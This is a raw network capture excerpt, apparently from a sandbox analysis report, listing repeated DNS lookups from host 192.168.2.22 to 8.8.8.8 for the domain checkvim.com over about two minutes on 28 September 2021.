                    Sep 28, 2021 06:51:18.758816957 CEST53633988.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:19.352169037 CEST5569353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:19.371682882 CEST53556938.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:19.994096041 CEST5997953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:20.010968924 CEST53599798.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:20.643477917 CEST6499553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:20.662913084 CEST53649958.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:21.261858940 CEST5328953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:21.281076908 CEST53532898.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:21.888906002 CEST6257853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:21.908377886 CEST53625788.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:22.516736984 CEST5010853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:22.536520004 CEST53501088.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:23.168349028 CEST5360553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:23.187026024 CEST53536058.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:23.780982018 CEST5159353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:23.800335884 CEST53515938.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:24.422507048 CEST5015753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:24.439459085 CEST53501578.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:25.031002998 CEST5395253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:25.053002119 CEST53539528.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:25.657380104 CEST5203453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:25.677412033 CEST53520348.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:26.291126966 CEST6416653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:26.308763981 CEST53641668.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:26.962842941 CEST5958053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:26.982305050 CEST53595808.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:27.583534002 CEST5261653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:27.600348949 CEST53526168.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:28.176142931 CEST4976153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:28.193268061 CEST53497618.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:28.790585995 CEST6152153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:28.808218002 CEST53615218.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:29.391048908 CEST6351153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:29.410531044 CEST53635118.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:30.007622957 CEST6454153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:30.026681900 CEST53645418.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:30.622982025 CEST6287453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:30.642488003 CEST53628748.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:31.258003950 CEST6280453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:31.277529955 CEST53628048.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:31.890103102 CEST6336953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:31.911752939 CEST53633698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:32.550587893 CEST6489653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:32.569732904 CEST53648968.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:33.157046080 CEST5333253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:33.175820112 CEST53533328.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:33.804022074 CEST6282253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:33.823859930 CEST53628228.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:34.427304983 CEST5498753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:34.446486950 CEST53549878.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:35.052763939 CEST5007453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:35.073288918 CEST53500748.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:35.669967890 CEST4977553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:35.688777924 CEST53497758.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:36.321048021 CEST5851653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:36.340655088 CEST53585168.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:36.957783937 CEST6318753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:36.977107048 CEST53631878.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:37.564486980 CEST6027853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:37.583689928 CEST53602788.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:38.208432913 CEST6035253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:38.227706909 CEST53603528.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:38.829217911 CEST5586953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:38.848547935 CEST53558698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:39.452426910 CEST6302553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:39.471940994 CEST53630258.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:40.416774988 CEST5253453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:40.437524080 CEST53525348.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:41.019485950 CEST5935053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:41.041893959 CEST53593508.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:41.626322031 CEST5445653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:41.645601034 CEST53544568.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:42.283423901 CEST5919653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:42.304616928 CEST53591968.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:42.907963991 CEST5080453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:42.928423882 CEST53508048.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:43.508258104 CEST5514353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:43.525496006 CEST53551438.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:44.127722025 CEST6089253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:44.146752119 CEST53608928.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:44.765714884 CEST5890253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:44.785208941 CEST53589028.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:45.401850939 CEST5138953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:45.422796011 CEST53513898.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:46.009896040 CEST5054453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:46.027328968 CEST53505448.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:46.632900000 CEST6393353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:46.652699947 CEST53639338.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:47.259546041 CEST6439953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:47.281250000 CEST53643998.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:47.895335913 CEST5566153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:47.912065029 CEST53556618.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:48.521167040 CEST5443653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:48.542418957 CEST53544368.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:49.163410902 CEST5516853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:49.182720900 CEST53551688.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:49.793617010 CEST6028053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:49.812793970 CEST53602808.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:50.409174919 CEST5551653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:50.428427935 CEST53555168.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:51.076284885 CEST5596953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:51.094007015 CEST53559698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:51.765100002 CEST5846653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:51.785337925 CEST53584668.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:52.385508060 CEST6210653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:52.404402971 CEST53621068.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:53.012155056 CEST5599253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:53.032078981 CEST53559928.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:53.635257959 CEST6270153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:53.652053118 CEST53627018.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:54.247356892 CEST5165853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:54.266855001 CEST53516588.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:54.878504038 CEST6266553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:54.898588896 CEST53626658.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:55.483758926 CEST5618153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:55.501737118 CEST53561818.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:56.264363050 CEST5937753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:56.284024954 CEST53593778.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:56.878813028 CEST5021253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:56.897857904 CEST53502128.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:57.643562078 CEST6133353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:57.662775040 CEST53613338.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:58.263293982 CEST5982753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:58.280199051 CEST53598278.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:58.883229017 CEST5788453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:58.900548935 CEST53578848.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:59.524702072 CEST5230153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:59.543994904 CEST53523018.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:00.126727104 CEST5098453192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:00.146327972 CEST53509848.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:00.767751932 CEST6216253192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:00.787919998 CEST53621628.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:01.459906101 CEST5360953192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:01.479352951 CEST53536098.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.086131096 CEST5746853192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.105777979 CEST53574688.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.770040989 CEST5823453192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.789148092 CEST53582348.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:03.436384916 CEST6191553192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:03.457667112 CEST53619158.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:04.040453911 CEST5179153192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:04.060210943 CEST53517918.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Sep 28, 2021 06:50:29.479912043 CEST192.168.2.228.8.8.80xe7f9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.139365911 CEST192.168.2.228.8.8.80xa67bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.691550970 CEST192.168.2.228.8.8.80x3958Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:31.397732973 CEST192.168.2.228.8.8.80x5f12Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:33.491646051 CEST192.168.2.228.8.8.80x9ca6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.241339922 CEST192.168.2.228.8.8.80xe8f3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.892030001 CEST192.168.2.228.8.8.80x1942Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:37.517440081 CEST192.168.2.228.8.8.80xca69Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.161380053 CEST192.168.2.228.8.8.80x120bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.872611046 CEST192.168.2.228.8.8.80x6d9bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:39.543977022 CEST192.168.2.228.8.8.80x1ddStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.224781036 CEST192.168.2.228.8.8.80xc75bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.868150949 CEST192.168.2.228.8.8.80xb758Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:41.540992975 CEST192.168.2.228.8.8.80x573Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.207612038 CEST192.168.2.228.8.8.80x47cdStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.861419916 CEST192.168.2.228.8.8.80x2585Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:43.562501907 CEST192.168.2.228.8.8.80xe128Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.223608017 CEST192.168.2.228.8.8.80x7c94Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.894368887 CEST192.168.2.228.8.8.80x22e6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:45.510138988 CEST192.168.2.228.8.8.80xaf08Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.159521103 CEST192.168.2.228.8.8.80xe7edStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.836015940 CEST192.168.2.228.8.8.80xb5d5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:47.470155001 CEST192.168.2.228.8.8.80x4469Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.125072002 CEST192.168.2.228.8.8.80x27fcStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.797341108 CEST192.168.2.228.8.8.80x27afStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:49.456911087 CEST192.168.2.228.8.8.80x5bccStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.103096962 CEST192.168.2.228.8.8.80x584dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.736572981 CEST192.168.2.228.8.8.80x7e52Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:51.573493958 CEST192.168.2.228.8.8.80xc11Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:52.347374916 CEST192.168.2.228.8.8.80x54a8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.273158073 CEST192.168.2.228.8.8.80x1a9bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.927613974 CEST192.168.2.228.8.8.80xedb1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:54.591924906 CEST192.168.2.228.8.8.80xdf9eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.214793921 CEST192.168.2.228.8.8.80x113eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.894778967 CEST192.168.2.228.8.8.80x8cc3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:56.533139944 CEST192.168.2.228.8.8.80xbae2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.189132929 CEST192.168.2.228.8.8.80xf818Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.797666073 CEST192.168.2.228.8.8.80x90bcStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:58.491209030 CEST192.168.2.228.8.8.80xd685Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.137286901 CEST192.168.2.228.8.8.80x2384Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.792362928 CEST192.168.2.228.8.8.80xfc87Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:00.442684889 CEST192.168.2.228.8.8.80xd67aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.097755909 CEST192.168.2.228.8.8.80xa7e8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.767754078 CEST192.168.2.228.8.8.80xd14Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:02.415457010 CEST192.168.2.228.8.8.80x916fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.058557987 CEST192.168.2.228.8.8.80xbbb4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.716505051 CEST192.168.2.228.8.8.80x3d1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.366527081 CEST192.168.2.228.8.8.80xe82eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.998681068 CEST192.168.2.228.8.8.80x5705Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.614173889 CEST192.168.2.228.8.8.80x3e25Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.227550030 CEST192.168.2.228.8.8.80x70b4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.860356092 CEST192.168.2.228.8.8.80x7f95Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:07.506026983 CEST192.168.2.228.8.8.80x7633Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.143147945 CEST192.168.2.228.8.8.80x264cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.750855923 CEST192.168.2.228.8.8.80x3cd3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.357036114 CEST192.168.2.228.8.8.80xa48dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.988940001 CEST192.168.2.228.8.8.80xde0eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.594608068 CEST192.168.2.228.8.8.80xb4f5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.237409115 CEST192.168.2.228.8.8.80x8c7bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.828600883 CEST192.168.2.228.8.8.80xab7bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:12.454752922 CEST192.168.2.228.8.8.80x7ce5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.094235897 CEST192.168.2.228.8.8.80x7348Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.729536057 CEST192.168.2.228.8.8.80xba52Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.335000992 CEST192.168.2.228.8.8.80x23e2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.965274096 CEST192.168.2.228.8.8.80x4ed0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:15.632652044 CEST192.168.2.228.8.8.80xd6d7Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.251604080 CEST192.168.2.228.8.8.80x76b5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.858936071 CEST192.168.2.228.8.8.80x4a4dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:17.496031046 CEST192.168.2.228.8.8.80x65eeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.093348026 CEST192.168.2.228.8.8.80x718bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.739155054 CEST192.168.2.228.8.8.80x83b4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.352169037 CEST192.168.2.228.8.8.80x62c8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.994096041 CEST192.168.2.228.8.8.80xb755Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.643477917 CEST192.168.2.228.8.8.80xdbbbStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.261858940 CEST192.168.2.228.8.8.80x2fbeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.888906002 CEST192.168.2.228.8.8.80xccbeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:22.516736984 CEST192.168.2.228.8.8.80x113eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.168349028 CEST192.168.2.228.8.8.80xe199Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.780982018 CEST192.168.2.228.8.8.80x3f8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:24.422507048 CEST192.168.2.228.8.8.80x4107Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.031002998 CEST192.168.2.228.8.8.80x74acStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.657380104 CEST192.168.2.228.8.8.80xe2bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.291126966 CEST192.168.2.228.8.8.80xa16aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.962842941 CEST192.168.2.228.8.8.80x9490Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:27.583534002 CEST192.168.2.228.8.8.80xc414Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.176142931 CEST192.168.2.228.8.8.80x7ac6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.790585995 CEST192.168.2.228.8.8.80x132cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:29.391048908 CEST192.168.2.228.8.8.80x4a40Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.007622957 CEST192.168.2.228.8.8.80xce0aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.622982025 CEST192.168.2.228.8.8.80x26a4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.258003950 CEST192.168.2.228.8.8.80xfbb5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.890103102 CEST192.168.2.228.8.8.80xfb02Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:32.550587893 CEST192.168.2.228.8.8.80x7463Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.157046080 CEST192.168.2.228.8.8.80x214eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.804022074 CEST192.168.2.228.8.8.80x4df1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:34.427304983 CEST192.168.2.228.8.8.80xdb50Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.052763939 CEST192.168.2.228.8.8.80x2a25Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.669967890 CEST192.168.2.228.8.8.80x64feStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.321048021 CEST192.168.2.228.8.8.80x785Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.957783937 CEST192.168.2.228.8.8.80xbf3cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:37.564486980 CEST192.168.2.228.8.8.80x3eeaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.208432913 CEST192.168.2.228.8.8.80xfb53Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.829217911 CEST192.168.2.228.8.8.80xeff0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:39.452426910 CEST192.168.2.228.8.8.80x2267Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:40.416774988 CEST192.168.2.228.8.8.80x97dfStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.019485950 CEST192.168.2.228.8.8.80x7445Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.626322031 CEST192.168.2.228.8.8.80x83b1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.283423901 CEST192.168.2.228.8.8.80x1e7fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.907963991 CEST192.168.2.228.8.8.80x8815Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:43.508258104 CEST192.168.2.228.8.8.80xe640Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.127722025 CEST192.168.2.228.8.8.80x2d16Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.765714884 CEST192.168.2.228.8.8.80x716fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:45.401850939 CEST192.168.2.228.8.8.80xc08Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.009896040 CEST192.168.2.228.8.8.80x6ceaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.632900000 CEST192.168.2.228.8.8.80x30eaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.259546041 CEST192.168.2.228.8.8.80x1d51Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.895335913 CEST192.168.2.228.8.8.80x6008Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:48.521167040 CEST192.168.2.228.8.8.80xd582Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.163410902 CEST192.168.2.228.8.8.80xb3eaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.793617010 CEST192.168.2.228.8.8.80xbbd0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:50.409174919 CEST192.168.2.228.8.8.80x21ceStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.076284885 CEST192.168.2.228.8.8.80x5fe2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.765100002 CEST192.168.2.228.8.8.80xcfa8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:52.385508060 CEST192.168.2.228.8.8.80x46c7Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.012155056 CEST192.168.2.228.8.8.80xc0b8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.635257959 CEST192.168.2.228.8.8.80x8d66Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.247356892 CEST192.168.2.228.8.8.80xa872Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.878504038 CEST192.168.2.228.8.8.80xaaacStandard query (0)checkvim.comA (IP address)IN (0x0001)
